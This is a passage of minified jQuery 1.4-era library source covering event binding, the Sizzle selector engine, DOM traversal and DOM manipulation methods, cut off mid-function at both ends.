type==="unload"&&name!=="one"?this.one(type,data,fn):this.each(function(){jQuery.event.add(this,type,handler,data)})}});jQuery.fn.extend({unbind:function(type,fn){if(typeof type==="object"&&!type.preventDefault){for(var key in type){this.unbind(key,type[key])}return this}return this.each(function(){jQuery.event.remove(this,type,fn)})},trigger:function(type,data){return this.each(function(){jQuery.event.trigger(type,data,this)})},triggerHandler:function(type,data){if(this[0]){var event=jQuery.Event(type);event.preventDefault();event.stopPropagation();jQuery.event.trigger(event,data,this[0]);return event.result}},toggle:function(fn){var args=arguments,i=1;while(i<args.length){jQuery.proxy(fn,args[i++])}return this.click(jQuery.proxy(fn,function(event){var lastToggle=(jQuery.data(this,"lastToggle"+fn.guid)||0)%i;jQuery.data(this,"lastToggle"+fn.guid,lastToggle+1);event.preventDefault();return args[lastToggle].apply(this,arguments)||false}))},hover:function(fnOver,fnOut){return this.mouseenter(fnOver).mouseleave(fnOut||fnOver)}});jQuery.each(["live","die"],function(i,name){jQuery.fn[name]=function(types,data,fn){var type,i=0;if(jQuery.isFunction(data)){fn=data;data=undefined}types=(types||"").split(/\s+/);while((type=types[i++])!=null){type=type==="focus"?"focusin":type==="blur"?"focusout":type==="hover"?types.push("mouseleave")&&"mouseenter":type;if(name==="live"){jQuery(this.context).bind(liveConvert(type,this.selector),{data:data,selector:this.selector,live:type},fn)}else{jQuery(this.context).unbind(liveConvert(type,this.selector),fn?{guid:fn.guid+this.selector+type}:null)}}return this}});function liveHandler(event){var stop,elems=[],selectors=[],args=arguments,related,match,fn,elem,j,i,l,data,live=jQuery.extend({},jQuery.data(this,"events").live);if(event.button&&event.type==="click"){return}for(j in live){fn=live[j];if(fn.live===event.type||fn.altLive&&jQuery.inArray(event.type,fn.altLive)>-1){data=fn.data;if(!(data.beforeFilter&&data.beforeFilter[event.type]&&!data.beforeFilter[event.type](event))){selectors.push(fn.selector)}}else{delete live[j]}}match=jQuery(event.target).closest(selectors,event.currentTarget);for(i=0,l=match.length;i<l;i++){for(j in live){fn=live[j];elem=match[i].elem;related=null;if(match[i].selector===fn.selector){if(fn.live==="mouseenter"||fn.live==="mouseleave"){related=jQuery(event.relatedTarget).closest(fn.selector)[0]}if(!related||related!==elem){elems.push({elem:elem,fn:fn})}}}}for(i=0,l=elems.length;i<l;i++){match=elems[i];event.currentTarget=match.elem;event.data=match.fn.data;if(match.fn.apply(match.elem,args)===false){stop=false;break}}return stop}function liveConvert(type,selector){return"live."+(type?type+".":"")+selector.replace(/\./g,"`").replace(/ /g,"&")}jQuery.each(("blur focus focusin focusout load resize scroll unload click dblclick "+"mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave "+"change select submit keydown keypress keyup error").split(" "),function(i,name){jQuery.fn[name]=function(fn){return fn?this.bind(name,fn):this.trigger(name)};if(jQuery.attrFn){jQuery.attrFn[name]=true}});if(window.attachEvent&&!window.addEventListener){window.attachEvent("onunload",function(){for(var id in jQuery.cache){if(jQuery.cache[id].handle){try{jQuery.event.remove(jQuery.cache[id].handle.elem)}catch(e){}}}})}(function(){var chunker=/((?:\((?:\([^()]+\)|[^()]+)+\)|\[(?:\[[^[\]]*\]|['"][^'"]*['"]|[^[\]'"]+)+\]|\\.|[^ >+~,(\[\\]+)+|[>+~])(\s*,\s*)?((?:.|\r|\n)*)/g,done=0,toString=Object.prototype.toString,hasDuplicate=false,baseHasDuplicate=true;[0,0].sort(function(){baseHasDuplicate=false;return 0});var Sizzle=function(selector,context,results,seed){results=results||[];var origContext=context=context||document;if(context.nodeType!==1&&context.nodeType!==9){return[]}if(!selector||typeof selector!=="string"){return results}var parts=[],m,set,checkSet,extra,prune=true,contextXML=isXML(context),soFar=selector;while((chunker.exec(""),m=chunker.exec(soFar))!==null){soFar=m[3];parts.push(m[1]);if(m[2]){extra=m[3];break}}if(parts.length>1&&origPOS.exec(selector)){if(parts.length===2&&Expr.relative[parts[0]]){set=posProcess(parts[0]+parts[1],context)}else{set=Expr.relative[parts[0]]?[context]:Sizzle(parts.shift(),context);while(parts.length){selector=parts.shift();if(Expr.relative[selector]){selector+=parts.shift()}set=posProcess(selector,set)}}}else{if(!seed&&parts.length>1&&context.nodeType===9&&!contextXML&&Expr.match.ID.test(parts[0])&&!Expr.match.ID.test(parts[parts.length-1])){var ret=Sizzle.find(parts.shift(),context,contextXML);context=ret.expr?Sizzle.filter(ret.expr,ret.set)[0]:ret.set[0]}if(context){var ret=seed?{expr:parts.pop(),set:makeArray(seed)}:Sizzle.find(parts.pop(),parts.length===1&&(parts[0]==="~"||parts[0]==="+")&&context.parentNode?context.parentNode:context,contextXML);set=ret.expr?Sizzle.filter(ret.expr,ret.set):ret.set;if(parts.length>0){checkSet=makeArray(set)}else{prune=false}while(parts.length){var cur=parts.pop(),pop=cur;if(!Expr.relative[cur]){cur=""}else{pop=parts.pop()}if(pop==null){pop=context}Expr.relative[cur](checkSet,pop,contextXML)}}else{checkSet=parts=[]}}if(!checkSet){checkSet=set}if(!checkSet){Sizzle.error(cur||selector)}if(toString.call(checkSet)==="[object Array]"){if(!prune){results.push.apply(results,checkSet)}else if(context&&context.nodeType===1){for(var i=0;checkSet[i]!=null;i++){if(checkSet[i]&&(checkSet[i]===true||checkSet[i].nodeType===1&&contains(context,checkSet[i]))){results.push(set[i])}}}else{for(var i=0;checkSet[i]!=null;i++){if(checkSet[i]&&checkSet[i].nodeType===1){results.push(set[i])}}}}else{makeArray(checkSet,results)}if(extra){Sizzle(extra,origContext,results,seed);Sizzle.uniqueSort(results)}return results};Sizzle.uniqueSort=function(results){if(sortOrder){hasDuplicate=baseHasDuplicate;results.sort(sortOrder);if(hasDuplicate){for(var i=1;i<results.length;i++){if(results[i]===results[i-1]){results.splice(i--,1)}}}}return results};Sizzle.matches=function(expr,set){return Sizzle(expr,null,null,set)};Sizzle.find=function(expr,context,isXML){var set,match;if(!expr){return[]}for(var i=0,l=Expr.order.length;i<l;i++){var type=Expr.order[i],match;if((match=Expr.leftMatch[type].exec(expr))){var left=match[1];match.splice(1,1);if(left.substr(left.length-1)!=="\\"){match[1]=(match[1]||"").replace(/\\/g,"");set=Expr.find[type](match,context,isXML);if(set!=null){expr=expr.replace(Expr.match[type],"");break}}}}if(!set){set=context.getElementsByTagName("*")}return{set:set,expr:expr}};Sizzle.filter=function(expr,set,inplace,not){var old=expr,result=[],curLoop=set,match,anyFound,isXMLFilter=set&&set[0]&&isXML(set[0]);while(expr&&set.length){for(var type in Expr.filter){if((match=Expr.leftMatch[type].exec(expr))!=null&&match[2]){var filter=Expr.filter[type],found,item,left=match[1];anyFound=false;match.splice(1,1);if(left.substr(left.length-1)==="\\"){continue}if(curLoop===result){result=[]}if(Expr.preFilter[type]){match=Expr.preFilter[type](match,curLoop,inplace,result,not,isXMLFilter);if(!match){anyFound=found=true}else if(match===true){continue}}if(match){for(var i=0;(item=curLoop[i])!=null;i++){if(item){found=filter(item,match,i,curLoop);var pass=not^!!found;if(inplace&&found!=null){if(pass){anyFound=true}else{curLoop[i]=false}}else if(pass){result.push(item);anyFound=true}}}}if(found!==undefined){if(!inplace){curLoop=result}expr=expr.replace(Expr.match[type],"");if(!anyFound){return[]}break}}}if(expr===old){if(anyFound==null){Sizzle.error(expr)}else{break}}old=expr}return curLoop};Sizzle.error=function(msg){throw"Syntax error, unrecognized expression: "+msg;};var Expr=Sizzle.selectors={order:["ID","NAME","TAG"],match:{ID:/#((?:[\w\u00c0-\uFFFF-]|\\.)+)/,CLASS:/\.((?:[\w\u00c0-\uFFFF-]|\\.)+)/,NAME:/\[name=['"]*((?:[\w\u00c0-\uFFFF-]|\\.)+)['"]*\]/,ATTR:/\[\s*((?:[\w\u00c0-\uFFFF-]|\\.)+)\s*(?:(\S?=)\s*(['"]*)(.*?)\3|)\s*\]/,TAG:/^((?:[\w\u00c0-\uFFFF\*-]|\\.)+)/,CHILD:/:(only|nth|last|first)-child(?:\((even|odd|[\dn+-]*)\))?/,POS:/:(nth|eq|gt|lt|first|last|even|odd)(?:\((\d*)\))?(?=[^-]|$)/,PSEUDO:/:((?:[\w\u00c0-\uFFFF-]|\\.)+)(?:\((['"]?)((?:\([^\)]+\)|[^\(\)]*)+)\2\))?/},leftMatch:{},attrMap:{"class":"className","for":"htmlFor"},attrHandle:{href:function(elem){return elem.getAttribute("href")}},relative:{"+":function(checkSet,part){var isPartStr=typeof part==="string",isTag=isPartStr&&!/\W/.test(part),isPartStrNotTag=isPartStr&&!isTag;if(isTag){part=part.toLowerCase()}for(var i=0,l=checkSet.length,elem;i<l;i++){if((elem=checkSet[i])){while((elem=elem.previousSibling)&&elem.nodeType!==1){}checkSet[i]=isPartStrNotTag||elem&&elem.nodeName.toLowerCase()===part?elem||false:elem===part}}if(isPartStrNotTag){Sizzle.filter(part,checkSet,true)}},">":function(checkSet,part){var isPartStr=typeof part==="string";if(isPartStr&&!/\W/.test(part)){part=part.toLowerCase();for(var i=0,l=checkSet.length;i<l;i++){var elem=checkSet[i];if(elem){var parent=elem.parentNode;checkSet[i]=parent.nodeName.toLowerCase()===part?parent:false}}}else{for(var i=0,l=checkSet.length;i<l;i++){var elem=checkSet[i];if(elem){checkSet[i]=isPartStr?elem.parentNode:elem.parentNode===part}}if(isPartStr){Sizzle.filter(part,checkSet,true)}}},"":function(checkSet,part,isXML){var doneName=done++,checkFn=dirCheck;if(typeof part==="string"&&!/\W/.test(part)){var nodeCheck=part=part.toLowerCase();checkFn=dirNodeCheck}checkFn("parentNode",part,doneName,checkSet,nodeCheck,isXML)},"~":function(checkSet,part,isXML){var doneName=done++,checkFn=dirCheck;if(typeof part==="string"&&!/\W/.test(part)){var nodeCheck=part=part.toLowerCase();checkFn=dirNodeCheck}checkFn("previousSibling",part,doneName,checkSet,nodeCheck,isXML)}},find:{ID:function(match,context,isXML){if(typeof context.getElementById!=="undefined"&&!isXML){var m=context.getElementById(match[1]);return m?[m]:[]}},NAME:function(match,context){if(typeof context.getElementsByName!=="undefined"){var ret=[],results=context.getElementsByName(match[1]);for(var i=0,l=results.length;i<l;i++){if(results[i].getAttribute("name")===match[1]){ret.push(results[i])}}return ret.length===0?null:ret}},TAG:function(match,context){return context.getElementsByTagName(match[1])}},preFilter:{CLASS:function(match,curLoop,inplace,result,not,isXML){match=" "+match[1].replace(/\\/g,"")+" ";if(isXML){return match}for(var i=0,elem;(elem=curLoop[i])!=null;i++){if(elem){if(not^(elem.className&&(" "+elem.className+" ").replace(/[\t\n]/g," ").indexOf(match)>=0)){if(!inplace){result.push(elem)}}else if(inplace){curLoop[i]=false}}}return false},ID:function(match){return match[1].replace(/\\/g,"")},TAG:function(match,curLoop){return match[1].toLowerCase()},CHILD:function(match){if(match[1]==="nth"){var test=/(-?)(\d*)n((?:\+|-)?\d*)/.exec(match[2]==="even"&&"2n"||match[2]==="odd"&&"2n+1"||!/\D/.test(match[2])&&"0n+"+match[2]||match[2]);match[2]=(test[1]+(test[2]||1))-0;match[3]=test[3]-0}match[0]=done++;return match},ATTR:function(match,curLoop,inplace,result,not,isXML){var name=match[1].replace(/\\/g,"");if(!isXML&&Expr.attrMap[name]){match[1]=Expr.attrMap[name]}if(match[2]==="~="){match[4]=" "+match[4]+" "}return match},PSEUDO:function(match,curLoop,inplace,result,not){if(match[1]==="not"){if((chunker.exec(match[3])||"").length>1||/^\w/.test(match[3])){match[3]=Sizzle(match[3],null,null,curLoop)}else{var ret=Sizzle.filter(match[3],curLoop,inplace,true^not);if(!inplace){result.push.apply(result,ret)}return false}}else if(Expr.match.POS.test(match[0])||Expr.match.CHILD.test(match[0])){return true}return match},POS:function(match){match.unshift(true);return match}},filters:{enabled:function(elem){return elem.disabled===false&&elem.type!=="hidden"},disabled:function(elem){return elem.disabled===true},checked:function(elem){return elem.checked===true},selected:function(elem){elem.parentNode.selectedIndex;return elem.selected===true},parent:function(elem){return!!elem.firstChild},empty:function(elem){return!elem.firstChild},has:function(elem,i,match){return!!Sizzle(match[3],elem).length},header:function(elem){return/h\d/i.test(elem.nodeName)},text:function(elem){return"text"===elem.type},radio:function(elem){return"radio"===elem.type},checkbox:function(elem){return"checkbox"===elem.type},file:function(elem){return"file"===elem.type},password:function(elem){return"password"===elem.type},submit:function(elem){return"submit"===elem.type},image:function(elem){return"image"===elem.type},reset:function(elem){return"reset"===elem.type},button:function(elem){return"button"===elem.type||elem.nodeName.toLowerCase()==="button"},input:function(elem){return/input|select|textarea|button/i.test(elem.nodeName)}},setFilters:{first:function(elem,i){return i===0},last:function(elem,i,match,array){return i===array.length-1},even:function(elem,i){return i%2===0},odd:function(elem,i){return i%2===1},lt:function(elem,i,match){return i<match[3]-0},gt:function(elem,i,match){return i>match[3]-0},nth:function(elem,i,match){return match[3]-0===i},eq:function(elem,i,match){return match[3]-0===i}},filter:{PSEUDO:function(elem,match,i,array){var name=match[1],filter=Expr.filters[name];if(filter){return filter(elem,i,match,array)}else if(name==="contains"){return(elem.textContent||elem.innerText||getText([elem])||"").indexOf(match[3])>=0}else if(name==="not"){var not=match[3];for(var i=0,l=not.length;i<l;i++){if(not[i]===elem){return false}}return true}else{Sizzle.error("Syntax error, unrecognized expression: "+name)}},CHILD:function(elem,match){var type=match[1],node=elem;switch(type){case'only':case'first':while((node=node.previousSibling)){if(node.nodeType===1){return false}}if(type==="first"){return true}node=elem;case'last':while((node=node.nextSibling)){if(node.nodeType===1){return false}}return true;case'nth':var first=match[2],last=match[3];if(first===1&&last===0){return true}var doneName=match[0],parent=elem.parentNode;if(parent&&(parent.sizcache!==doneName||!elem.nodeIndex)){var count=0;for(node=parent.firstChild;node;node=node.nextSibling){if(node.nodeType===1){node.nodeIndex=++count}}parent.sizcache=doneName}var diff=elem.nodeIndex-last;if(first===0){return diff===0}else{return(diff%first===0&&diff/first>=0)}}},ID:function(elem,match){return elem.nodeType===1&&elem.getAttribute("id")===match},TAG:function(elem,match){return(match==="*"&&elem.nodeType===1)||elem.nodeName.toLowerCase()===match},CLASS:function(elem,match){return(" "+(elem.className||elem.getAttribute("class"))+" ").indexOf(match)>-1},ATTR:function(elem,match){var name=match[1],result=Expr.attrHandle[name]?Expr.attrHandle[name](elem):elem[name]!=null?elem[name]:elem.getAttribute(name),value=result+"",type=match[2],check=match[4];return result==null?type==="!=":type==="="?value===check:type==="*="?value.indexOf(check)>=0:type==="~="?(" "+value+" ").indexOf(check)>=0:!check?value&&result!==false:type==="!="?value!==check:type==="^="?value.indexOf(check)===0:type==="$="?value.substr(value.length-check.length)===check:type==="|="?value===check||value.substr(0,check.length+1)===check+"-":false},POS:function(elem,match,i,array){var name=match[2],filter=Expr.setFilters[name];if(filter){return filter(elem,i,match,array)}}}};var origPOS=Expr.match.POS;for(var type in Expr.match){Expr.match[type]=new RegExp(Expr.match[type].source+/(?![^\[]*\])(?![^\(]*\))/.source);Expr.leftMatch[type]=new RegExp(/(^(?:.|\r|\n)*?)/.source+Expr.match[type].source.replace(/\\(\d+)/g,function(all,num){return"\\"+(num-0+1)}))}var makeArray=function(array,results){array=Array.prototype.slice.call(array,0);if(results){results.push.apply(results,array);return results}return array};try{Array.prototype.slice.call(document.documentElement.childNodes,0)}catch(e){makeArray=function(array,results){var ret=results||[];if(toString.call(array)==="[object Array]"){Array.prototype.push.apply(ret,array)}else{if(typeof array.length==="number"){for(var i=0,l=array.length;i<l;i++){ret.push(array[i])}}else{for(var i=0;array[i];i++){ret.push(array[i])}}}return ret}}var sortOrder;if(document.documentElement.compareDocumentPosition){sortOrder=function(a,b){if(!a.compareDocumentPosition||!b.compareDocumentPosition){if(a==b){hasDuplicate=true}return a.compareDocumentPosition?-1:1}var ret=a.compareDocumentPosition(b)&4?-1:a===b?0:1;if(ret===0){hasDuplicate=true}return ret}}else if("sourceIndex"in document.documentElement){sortOrder=function(a,b){if(!a.sourceIndex||!b.sourceIndex){if(a==b){hasDuplicate=true}return a.sourceIndex?-1:1}var ret=a.sourceIndex-b.sourceIndex;if(ret===0){hasDuplicate=true}return ret}}else if(document.createRange){sortOrder=function(a,b){if(!a.ownerDocument||!b.ownerDocument){if(a==b){hasDuplicate=true}return a.ownerDocument?-1:1}var aRange=a.ownerDocument.createRange(),bRange=b.ownerDocument.createRange();aRange.setStart(a,0);aRange.setEnd(a,0);bRange.setStart(b,0);bRange.setEnd(b,0);var ret=aRange.compareBoundaryPoints(Range.START_TO_END,bRange);if(ret===0){hasDuplicate=true}return ret}}function getText(elems){var ret="",elem;for(var i=0;elems[i];i++){elem=elems[i];if(elem.nodeType===3||elem.nodeType===4){ret+=elem.nodeValue}else if(elem.nodeType!==8){ret+=getText(elem.childNodes)}}return ret}(function(){var form=document.createElement("div"),id="script"+(new Date).getTime();form.innerHTML="<a name='"+id+"'/>";var root=document.documentElement;root.insertBefore(form,root.firstChild);if(document.getElementById(id)){Expr.find.ID=function(match,context,isXML){if(typeof context.getElementById!=="undefined"&&!isXML){var m=context.getElementById(match[1]);return m?m.id===match[1]||typeof m.getAttributeNode!=="undefined"&&m.getAttributeNode("id").nodeValue===match[1]?[m]:undefined:[]}};Expr.filter.ID=function(elem,match){var node=typeof elem.getAttributeNode!=="undefined"&&elem.getAttributeNode("id");return elem.nodeType===1&&node&&node.nodeValue===match}}root.removeChild(form);root=form=null})();(function(){var div=document.createElement("div");div.appendChild(document.createComment(""));if(div.getElementsByTagName("*").length>0){Expr.find.TAG=function(match,context){var results=context.getElementsByTagName(match[1]);if(match[1]==="*"){var tmp=[];for(var i=0;results[i];i++){if(results[i].nodeType===1){tmp.push(results[i])}}results=tmp}return results}}div.innerHTML="<a href='#'></a>";if(div.firstChild&&typeof div.firstChild.getAttribute!=="undefined"&&div.firstChild.getAttribute("href")!=="#"){Expr.attrHandle.href=function(elem){return elem.getAttribute("href",2)}}div=null})();if(document.querySelectorAll){(function(){var oldSizzle=Sizzle,div=document.createElement("div");div.innerHTML="<p class='TEST'></p>";if(div.querySelectorAll&&div.querySelectorAll(".TEST").length===0){return}Sizzle=function(query,context,extra,seed){context=context||document;if(!seed&&context.nodeType===9&&!isXML(context)){try{return makeArray(context.querySelectorAll(query),extra)}catch(e){}}return oldSizzle(query,context,extra,seed)};for(var prop in oldSizzle){Sizzle[prop]=oldSizzle[prop]}div=null})()}(function(){var div=document.createElement("div");div.innerHTML="<div class='test e'></div><div class='test'></div>";if(!div.getElementsByClassName||div.getElementsByClassName("e").length===0){return}div.lastChild.className="e";if(div.getElementsByClassName("e").length===1){return}Expr.order.splice(1,0,"CLASS");Expr.find.CLASS=function(match,context,isXML){if(typeof context.getElementsByClassName!=="undefined"&&!isXML){return context.getElementsByClassName(match[1])}};div=null})();function dirNodeCheck(dir,cur,doneName,checkSet,nodeCheck,isXML){for(var i=0,l=checkSet.length;i<l;i++){var elem=checkSet[i];if(elem){elem=elem[dir];var match=false;while(elem){if(elem.sizcache===doneName){match=checkSet[elem.sizset];break}if(elem.nodeType===1&&!isXML){elem.sizcache=doneName;elem.sizset=i}if(elem.nodeName.toLowerCase()===cur){match=elem;break}elem=elem[dir]}checkSet[i]=match}}}function dirCheck(dir,cur,doneName,checkSet,nodeCheck,isXML){for(var i=0,l=checkSet.length;i<l;i++){var elem=checkSet[i];if(elem){elem=elem[dir];var match=false;while(elem){if(elem.sizcache===doneName){match=checkSet[elem.sizset];break}if(elem.nodeType===1){if(!isXML){elem.sizcache=doneName;elem.sizset=i}if(typeof cur!=="string"){if(elem===cur){match=true;break}}else if(Sizzle.filter(cur,[elem]).length>0){match=elem;break}}elem=elem[dir]}checkSet[i]=match}}}var contains=document.compareDocumentPosition?function(a,b){return a.compareDocumentPosition(b)&16}:function(a,b){return a!==b&&(a.contains?a.contains(b):true)};var isXML=function(elem){var documentElement=(elem?elem.ownerDocument||elem:0).documentElement;return documentElement?documentElement.nodeName!=="HTML":false};var posProcess=function(selector,context){var tmpSet=[],later="",match,root=context.nodeType?[context]:context;while((match=Expr.match.PSEUDO.exec(selector))){later+=match[0];selector=selector.replace(Expr.match.PSEUDO,"")}selector=Expr.relative[selector]?selector+"*":selector;for(var i=0,l=root.length;i<l;i++){Sizzle(selector,root[i],tmpSet)}return Sizzle.filter(later,tmpSet)};jQuery.find=Sizzle;jQuery.expr=Sizzle.selectors;jQuery.expr[":"]=jQuery.expr.filters;jQuery.unique=Sizzle.uniqueSort;jQuery.getText=getText;jQuery.isXMLDoc=isXML;jQuery.contains=contains;return;window.Sizzle=Sizzle})();var runtil=/Until$/,rparentsprev=/^(?:parents|prevUntil|prevAll)/,rmultiselector=/,/,slice=Array.prototype.slice;var winnow=function(elements,qualifier,keep){if(jQuery.isFunction(qualifier)){return jQuery.grep(elements,function(elem,i){return!!qualifier.call(elem,i,elem)===keep})}else if(qualifier.nodeType){return jQuery.grep(elements,function(elem,i){return(elem===qualifier)===keep})}else if(typeof qualifier==="string"){var filtered=jQuery.grep(elements,function(elem){return elem.nodeType===1});if(isSimple.test(qualifier)){return jQuery.filter(qualifier,filtered,!keep)}else{qualifier=jQuery.filter(qualifier,filtered)}}return jQuery.grep(elements,function(elem,i){return(jQuery.inArray(elem,qualifier)>=0)===keep})};jQuery.fn.extend({find:function(selector){var ret=this.pushStack("","find",selector),length=0;for(var i=0,l=this.length;i<l;i++){length=ret.length;jQuery.find(selector,this[i],ret);if(i>0){for(var n=length;n<ret.length;n++){for(var r=0;r<length;r++){if(ret[r]===ret[n]){ret.splice(n--,1);break}}}}}return ret},has:function(target){var targets=jQuery(target);return this.filter(function(){for(var i=0,l=targets.length;i<l;i++){if(jQuery.contains(this,targets[i])){return true}}})},not:function(selector){return this.pushStack(winnow(this,selector,false),"not",selector)},filter:function(selector){return this.pushStack(winnow(this,selector,true),"filter",selector)},is:function(selector){return!!selector&&jQuery.filter(selector,this).length>0},closest:function(selectors,context){if(jQuery.isArray(selectors)){var ret=[],cur=this[0],match,matches={},selector;if(cur&&selectors.length){for(var i=0,l=selectors.length;i<l;i++){selector=selectors[i];if(!matches[selector]){matches[selector]=jQuery.expr.match.POS.test(selector)?jQuery(selector,context||this.context):selector}}while(cur&&cur.ownerDocument&&cur!==context){for(selector in matches){match=matches[selector];if(match.jquery?match.index(cur)>-1:jQuery(cur).is(match)){ret.push({selector:selector,elem:cur});delete matches[selector]}}cur=cur.parentNode}}return ret}var pos=jQuery.expr.match.POS.test(selectors)?jQuery(selectors,context||this.context):null;return this.map(function(i,cur){while(cur&&cur.ownerDocument&&cur!==context){if(pos?pos.index(cur)>-1:jQuery(cur).is(selectors)){return cur}cur=cur.parentNode}return null})},index:function(elem){if(!elem||typeof elem==="string"){return jQuery.inArray(this[0],elem?jQuery(elem):this.parent().children())}return jQuery.inArray(elem.jquery?elem[0]:elem,this)},add:function(selector,context){var set=typeof selector==="string"?jQuery(selector,context||this.context):jQuery.makeArray(selector),all=jQuery.merge(this.get(),set);return this.pushStack(isDisconnected(set[0])||isDisconnected(all[0])?all:jQuery.unique(all))},andSelf:function(){return this.add(this.prevObject)}});function isDisconnected(node){return!node||!node.parentNode||node.parentNode.nodeType===11}jQuery.each({parent:function(elem){var parent=elem.parentNode;return parent&&parent.nodeType!==11?parent:null},parents:function(elem){return jQuery.dir(elem,"parentNode")},parentsUntil:function(elem,i,until){return jQuery.dir(elem,"parentNode",until)},next:function(elem){return jQuery.nth(elem,2,"nextSibling")},prev:function(elem){return jQuery.nth(elem,2,"previousSibling")},nextAll:function(elem){return jQuery.dir(elem,"nextSibling")},prevAll:function(elem){return jQuery.dir(elem,"previousSibling")},nextUntil:function(elem,i,until){return jQuery.dir(elem,"nextSibling",until)},prevUntil:function(elem,i,until){return jQuery.dir(elem,"previousSibling",until)},siblings:function(elem){return jQuery.sibling(elem.parentNode.firstChild,elem)},children:function(elem){return jQuery.sibling(elem.firstChild)},contents:function(elem){return jQuery.nodeName(elem,"iframe")?elem.contentDocument||elem.contentWindow.document:jQuery.makeArray(elem.childNodes)}},function(name,fn){jQuery.fn[name]=function(until,selector){var ret=jQuery.map(this,fn,until);if(!runtil.test(name)){selector=until}if(selector&&typeof selector==="string"){ret=jQuery.filter(selector,ret)}ret=this.length>1?jQuery.unique(ret):ret;if((this.length>1||rmultiselector.test(selector))&&rparentsprev.test(name)){ret=ret.reverse()}return this.pushStack(ret,name,slice.call(arguments).join(","))}});jQuery.extend({filter:function(expr,elems,not){if(not){expr=":not("+expr+")"}return jQuery.find.matches(expr,elems)},dir:function(elem,dir,until){var matched=[],cur=elem[dir];while(cur&&cur.nodeType!==9&&(until===undefined||cur.nodeType!==1||!jQuery(cur).is(until))){if(cur.nodeType===1){matched.push(cur)}cur=cur[dir]}return matched},nth:function(cur,result,dir,elem){result=result||1;var num=0;for(;cur;cur=cur[dir]){if(cur.nodeType===1&&++num===result){break}}return cur},sibling:function(n,elem){var r=[];for(;n;n=n.nextSibling){if(n.nodeType===1&&n!==elem){r.push(n)}}return r}});var rinlinejQuery=/ jQuery\d+="(?:\d+|null)"/g,rleadingWhitespace=/^\s+/,rxhtmlTag=/(<([\w:]+)[^>]*?)\/>/g,rselfClosing=/^(?:area|br|col|embed|hr|img|input|link|meta|param)$/i,rtagName=/<([\w:]+)/,rtbody=/<tbody/i,rhtml=/<|&\w+;/,rchecked=/checked\s*(?:[^=]|=\s*.checked.)/i,fcloseTag=function(all,front,tag){return rselfClosing.test(tag)?all:front+"></"+tag+">"},wrapMap={option:[1,"<select multiple='multiple'>","</select>"],legend:[1,"<fieldset>","</fieldset>"],thead:[1,"<table>","</table>"],tr:[2,"<table><tbody>","</tbody></table>"],td:[3,"<table><tbody><tr>","</tr></tbody></table>"],col:[2,"<table><tbody></tbody><colgroup>","</colgroup></table>"],area:[1,"<map>","</map>"],_default:[0,"",""]};wrapMap.optgroup=wrapMap.option;wrapMap.tbody=wrapMap.tfoot=wrapMap.colgroup=wrapMap.caption=wrapMap.thead;wrapMap.th=wrapMap.td;if(!jQuery.support.htmlSerialize){wrapMap._default=[1,"div<div>","</div>"]}jQuery.fn.extend({text:function(text){if(jQuery.isFunction(text)){return this.each(function(i){var self=jQuery(this);self.text(text.call(this,i,self.text()))})}if(typeof text!=="object"&&text!==undefined){return this.empty().append((this[0]&&this[0].ownerDocument||document).createTextNode(text))}return jQuery.getText(this)},wrapAll:function(html){if(jQuery.isFunction(html)){return this.each(function(i){jQuery(this).wrapAll(html.call(this,i))})}if(this[0]){var wrap=jQuery(html,this[0].ownerDocument).eq(0).clone(true);if(this[0].parentNode){wrap.insertBefore(this[0])}wrap.map(function(){var elem=this;while(elem.firstChild&&elem.firstChild.nodeType===1){elem=elem.firstChild}return elem}).append(this)}return this},wrapInner:function(html){if(jQuery.isFunction(html)){return this.each(function(i){jQuery(this).wrapInner(html.call(this,i))})}return this.each(function(){var self=jQuery(this),contents=self.contents();if(contents.length){contents.wrapAll(html)}else{self.append(html)}})},wrap:function(html){return this.each(function(){jQuery(this).wrapAll(html)})},unwrap:function(){return this.parent().each(function(){if(!jQuery.nodeName(this,"body")){jQuery(this).replaceWith(this.childNodes)}}).end()},append:function(){return this.domManip(arguments,true,function(elem){if(this.nodeType===1){this.appendChild(elem)}})},prepend:function(){return this.domManip(arguments,true,function(elem){if(this.nodeType===1){this.insertBefore(elem,this.firstChild)}})},before:function(){if(this[0]&&this[0].parentNode){return this.domManip(arguments,false,function(elem){this.parentNode.insertBefore(elem,this)})}else if(arguments.length){var set=jQuery(arguments[0]);set.push.apply(set,this.toArray());return this.pushStack(set,"before",arguments)}},after:function(){if(this[0]&&this[0].parentNode){return this.domManip(arguments,false,function(elem){this.parentNode.insertBefore(elem,this.nextSibling)})}else if(arguments.length){var set=this.pushStack(this,"after",arguments);set.push.apply(set,jQuery(arguments[0]).toArray());return set}},clone:function(events){var ret=this.map(function(){if(!jQuery.support.noCloneEvent&&!jQuery.isXMLDoc(this)){var html=this.outerHTML,ownerDocument=this.ownerDocument;if(!html){var div=ownerDocument.createElement("div");div.appendChild(this.cloneNode(true));html=div.innerHTML}return jQuery.clean([html.replace(rinlinejQuery,"").replace(rleadingWhitespace,"")],ownerDocument)[0]}else{return this.cloneNode(true)}});if(events===true){cloneCopyEvent(this,ret);cloneCopyEvent(this.find("*"),ret.find("*"))}return ret},html:function(value){if(value===undefined){return this[0]&&this[0].nodeType===1?this[0].innerHTML.replace(rinlinejQuery,""):null}else if(typeof value==="string"&&!/<script/i.test(value)&&(jQuery.support.leadingWhitespace||!rleadingWhitespace.test(value))&&!wrapMap[(rtagName.exec(value)||["",""])[1].toLowerCase()]){value=value.replace(rxhtmlTag,fcloseTag);try{for(var i=0,l=this.length;i<l;i++){if(this[i].nodeType===1){jQuery.cleanData(this[i].getElementsByTagName("*"));this[i].innerHTML=value}}}catch(e){this.empty().append(value)}}else if(jQuery.isFunction(value)){this.each(function(i){var self=jQuery(this),old=self.html();self.empty().append(function(){return value.call(this,i,old)})})}else{this.empty().append(value)}return this},replaceWith:function(value){if(this[0]&&this[0].parentNode){if(!jQuery.isFunction(value)){value=jQuery(value).detach()}else{return this.each(function(i){var self=jQuery(this),old=self.html();self.replaceWith(value.call(this,i,old))})}return this.each(function(){var next=this.nextSibling,parent=this.parentNode;jQuery(this).remove();if(next){jQuery(next).before(value)}else{jQuery(parent).append(value)}})}else{return this.pushStack(jQuery(jQuery.isFunction(value)?value():value),"replaceWith",value)}},detach:function(selector){return this.remove(selector,true)},domManip:function(args,table,callback){var results,first,value=args[0],scripts=[];if(!jQuery.support.checkClone&&arguments.length===3&&typeof value==="string"&&rchecked.test(value)){return this.each(function(){jQuery(this).domManip(args,table,callback,true)})}if(jQuery.isFunction(value)){return this.each(function(i){var 